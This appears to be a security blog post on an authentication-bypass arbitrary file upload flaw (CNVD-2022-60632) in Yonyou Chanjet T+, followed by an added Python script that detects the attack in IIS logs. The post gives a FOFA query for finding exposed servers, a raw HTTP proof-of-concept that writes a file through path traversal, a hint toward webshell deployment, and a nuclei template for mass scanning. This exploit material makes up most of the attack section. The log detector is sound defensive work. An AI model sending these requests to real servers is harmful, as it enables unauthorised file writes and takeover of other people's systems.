Yonyou Chanjet T+ Upload.aspx Arbitrary File Upload Vulnerability (CNVD-2022-60632)

Published: 2023-09-07 14:17:28  Author: 学安全的小白

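Vulnerability Description

The Upload.aspx endpoint of Yonyou Chanjet T+ has an arbitrary file upload vulnerability. An attacker can use the preload parameter to bypass authentication, upload files, and take control of the server.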

Impact

Yonyou Chanjet T+

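Reproduction

FOFA query: app="畅捷通-TPlus"
The login page looks like this:

File type validation on upload is incomplete, so arbitrary files can be uploaded to any location on the server. Verification PoC: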

POST /tplus/SM/SetupAccount/Upload.aspx?preload=1 HTTP/1.1
Host:
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 261
User-Agent: Mozilla/5.0 (iPod; U; CPU iPhone OS 3_0 like Mac OS X; ko-KR) AppleWebKit/535.16.4 (KHTML, like Gecko) Version/3.0.5 Mobile/8B117 Safari/6535.16.4
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVXR9biLu
Connection: close

------WebKitFormBoundaryVXR9biLu
Content-Disposition: form-data; name="File1";filename="../../../../../../../Program Files (x86)/Chanjet/TPlusStd/WebSite/1.txt"
Content-Type: image/jpeg

1
------WebKitFormBoundaryVXR9biLu--


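Because the application is precompiled, a directly uploaded aspx trojan cannot be used as-is; a webshell only works after the dll and compiled files are uploaded as well.
Search for further exploitation details yourself.

nuclei YAML template for batch scanning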

id: yonyou_changjietong_upload_rce

info:
  name: yonyou_changjietong_upload_rce
  author: afan
  severity: high
  tags: yonyou,changjietong,bjxsec,yonyouoa
  description: fofa   app="畅捷通-TPlus"
variables:
  file_name: "{{to_lower(rand_text_alpha(8))}}.txt"
  file_content: "{{to_lower(rand_text_alpha(26))}}"
requests:
  - raw:
      - |
        POST /tplus/SM/SetupAccount/Upload.aspx?preload=1 HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 196
        Cache-Control: max-age=0
        Upgrade-Insecure-Requests: 1
        Origin: null
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarysHT4cEvOAWALSZEv
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close

        ------WebKitFormBoundarysHT4cEvOAWALSZEv
        Content-Disposition: form-data; name="File1"; filename="../{{file_name}}"
        Content-Type: image/jpeg

        {{file_content}}
        ------WebKitFormBoundarysHT4cEvOAWALSZEv--
      
      - |
        GET /tplus/SM/SetupAccount/{{file_name}} HTTP/1.1
        Host: {{Hostname}}

    req-condition: true
    matchers:
      - type: word
        words:
          - "{{file_content}}"
        part: body
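
Detection side of the two requests above, as an added example that is not part of the original post: it scans IIS W3C logs for POSTs to Upload.aspx that carry the preload parameter and for the follow-up GET of a non-aspx file from the same client, which is the pattern the nuclei template produces. The log field set, the IP addresses and the sample lines are constructed assumptions; paths and parameter names are matched case-insensitively.

```python
from urllib.parse import parse_qs

# Constructed IIS W3C sample (documentation IPs, invented timestamps and file name).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2023-09-07 06:01:10 198.51.100.7 GET /tplus/ - 200
2023-09-07 06:01:40 198.51.100.20 POST /tplus/SM/SetupAccount/Upload.aspx - 302
2023-09-07 06:02:31 203.0.113.9 POST /tplus/SM/SetupAccount/Upload.aspx preload=1 200
2023-09-07 06:02:33 203.0.113.9 GET /tplus/SM/SetupAccount/kqzpwmxa.txt - 200
2023-09-07 06:05:02 198.51.100.7 POST /TPLUS/sm/setupaccount/upload.aspx a=1&PreLoad=1 200
"""

UPLOAD_STEM = "/tplus/sm/setupaccount/upload.aspx"
UPLOAD_DIR = "/tplus/sm/setupaccount/"


def parse_w3c(text):
    """Yield one dict per request, keyed by the names in the #Fields line."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))


def find_upload_abuse(text):
    """Return (kind, client_ip, uri) findings in log order."""
    findings, uploaders = [], set()
    for r in parse_w3c(text):
        stem = r["cs-uri-stem"].lower()
        keys = {k.lower() for k in parse_qs(r["cs-uri-query"], keep_blank_values=True)}
        if r["cs-method"] == "POST" and stem == UPLOAD_STEM and "preload" in keys:
            # Upload request that uses the authentication bypass parameter.
            uploaders.add(r["c-ip"])
            findings.append(("preload-upload", r["c-ip"], r["cs-uri-stem"]))
        elif (r["cs-method"] == "GET" and r["c-ip"] in uploaders
              and stem.startswith(UPLOAD_DIR) and not stem.endswith(".aspx")):
            # Same client reading back a static file from the upload directory.
            findings.append(("fetch-after-upload", r["c-ip"], r["cs-uri-stem"]))
    return findings


if __name__ == "__main__":
    for finding in find_upload_abuse(SAMPLE_LOG):
        print(*finding)
```

IIS logs do not record the request body, so the `../` sequences in the multipart filename are only visible to a WAF or reverse proxy that inspects the upload itself.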